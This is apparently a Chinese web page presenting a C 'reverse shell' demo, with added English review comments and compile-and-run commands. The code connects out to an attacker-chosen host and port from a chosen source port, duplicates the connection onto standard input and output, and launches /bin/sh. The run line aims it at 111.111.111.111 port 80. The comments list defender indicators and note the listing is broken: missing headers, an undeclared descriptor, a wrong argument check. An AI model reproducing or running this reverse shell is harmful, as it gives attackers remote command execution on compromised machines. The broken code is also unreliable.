一个有趣的NC反弹shell的demo
/*
 * Demo client from the page: creates a stream socket, binds it to a
 * caller-chosen local source port, connects to a remote host/port, and then
 * tries to exec /bin/sh with descriptors 0, 1 and 2 duplicated from `fd`.
 *
 * NOTE(review): the listing does not compile as shown. The header name after
 * each #include is missing (probably stripped when the page was extracted),
 * and `fd` is never declared.
 *
 * Behaviour a defender can key on, all visible below:
 *   - an outbound stream socket that is bind()-ed to an explicit local port
 *     before connect(), so the source port is chosen by the caller rather
 *     than being ephemeral; filtering or alerting should therefore not treat
 *     the source port as evidence of which service is talking;
 *   - a /bin/sh process whose argv[0] is the literal string "sh -i";
 *   - dup2() onto descriptors 0, 1 and 2 immediately before the exec.
 */
#include
#include
#include
#include
#include

/*
 * Print `msg` followed by the current errno description (perror), then
 * terminate the process.
 *
 * NOTE(review): exits with status 0, so a failure is reported to the parent
 * process as success.
 */
void error(char *msg)
{
    perror(msg);
    exit(0);
}

/*
 * Usage: argv[1] = remote host, argv[2] = remote port, argv[3] = local
 * source port.
 */
int main(int argc,char *argv[])
{
    int sockfd,portno,lportno,n;    // `n` is never used in this listing
    struct sockaddr_in serv_addr;   // remote endpoint
    struct sockaddr_in client_addr; // local endpoint (carries the source port)
    struct hostent *server;
    char buffer[256];               // never used in this listing

    // NOTE(review): argv[3] is read below, so three arguments are required,
    // but this check only rejects fewer than two. With exactly two arguments
    // argv[3] is NULL and atoi(NULL) is undefined behaviour.
    if (argc < 3) {
        // NOTE(review): the trailing "n" looks like a "\n" whose backslash
        // was lost in extraction -- confirm against the original.
        fprintf(stderr,"usage %s hostname port LocalPortn",argv[0]);
        exit(0);
    }
    // Three arguments: target host, target host port, local source port.
    // atoi() gives no error indication; non-numeric input yields 0.
    portno = atoi(argv[2]);
    sockfd = socket(AF_INET,SOCK_STREAM,0);
    if (sockfd < 0)
        error("ERROR opening socket");

    // Zero the local address, then fill in family, any local interface, and
    // the requested source port in network byte order.
    bzero((char *) &client_addr,sizeof(client_addr));
    lportno = atoi(argv[3]);
    client_addr.sin_family = AF_INET;
    client_addr.sin_addr.s_addr = INADDR_ANY;
    client_addr.sin_port = htons(lportno); // set the source port
    if (bind(sockfd,(struct sockaddr *) &client_addr,sizeof(client_addr)) < 0)
        error("ERROR on binding");

    // Resolve the remote host name. gethostbyname() is obsolete;
    // getaddrinfo() is its replacement.
    server = gethostbyname(argv[1]);
    if (server == NULL) {
        fprintf(stderr,"ERROR,no such host ");
        exit(0);
    }

    // Build the remote address from the first resolved address and the
    // requested port.
    bzero((char *) &serv_addr,sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr,(char *)&serv_addr.sin_addr.s_addr,server->h_length);
    serv_addr.sin_port = htons(portno);

    // NOTE(review): &serv_addr is passed without the (struct sockaddr *)
    // cast that the bind() call above uses, so the pointer type does not
    // match connect()'s prototype.
    if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) // connect
        error("ERROR connecting");

    // Duplicate `fd` onto stdin, stdout and stderr; return values are not
    // checked. NOTE(review): `fd` is not declared anywhere in this listing.
    dup2(fd,0);
    dup2(fd,1);
    dup2(fd,2);

    // execl()'s second argument becomes argv[0] of the new program, so the
    // shell is started with argv[0] == "sh -i" and no separate "-i" option.
    execl("/bin/sh","sh -i",NULL); // execute the shell

    // Reached only if execl() fails, since a successful exec does not return.
    close(fd);
    // NOTE(review): no return statement at the end of main.
}
编译后的执行方法:
# Build the listing into an executable named "port".
gcc client-port.c -o port
# gcc already marks its output executable, so this step is redundant.
chmod +x port
# Arguments, in order: remote IP, remote listening port, local source port.
./port 你的IP 你的监听端口 本地的源端口
eg
./port 111.111.111.111 80 80